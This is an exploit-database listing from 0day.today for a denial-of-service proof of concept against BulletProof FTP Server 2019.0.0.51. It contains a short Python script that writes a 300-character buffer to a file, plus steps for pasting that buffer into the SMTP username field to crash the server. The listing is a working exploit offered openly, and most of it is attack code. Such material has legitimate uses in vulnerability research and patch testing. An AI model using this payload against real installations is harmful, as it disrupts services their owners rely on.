[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

BulletProof FTP Server 2019.0.0.51 Denial Of Service Exploit

Author
Yehia Elghaly
Risk
[
Security Risk Medium
]
0day-ID
0day-ID-38535
Category
dos / poc
Date add
06-04-2023
Platform
windows
#Exploit Title: BulletProof FTP Server 2019.0.0.51 - Denial of Service
#Discovery by: Yehia Elghaly - Mrvar0x
#Vendor Homepage: https://barcodemagic.com/
#Software Link: http://bpftpserver.com/products/bpftpserver/windows/download
#Tested Version: 2019.0.0.51
#Tested on: Windows 7 x86 

#Steps To Crash:
#Run: BulletProof_FTP_Server_2019.0.0.51.py
#Open poc.txt and copy content to clipboard
#Open BulletProof FTP Server - Select "Settings" > "SMTP"
#"Email Server" select "Username" and Paste Clipboard
#Click on "Test" -----> Crashed

buffer = "A" * 300
payload = buffer
try:
    f=open("Poc.txt","w")
    print "[+] Creating %s evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"

#  0day.today [2024-06-28]  #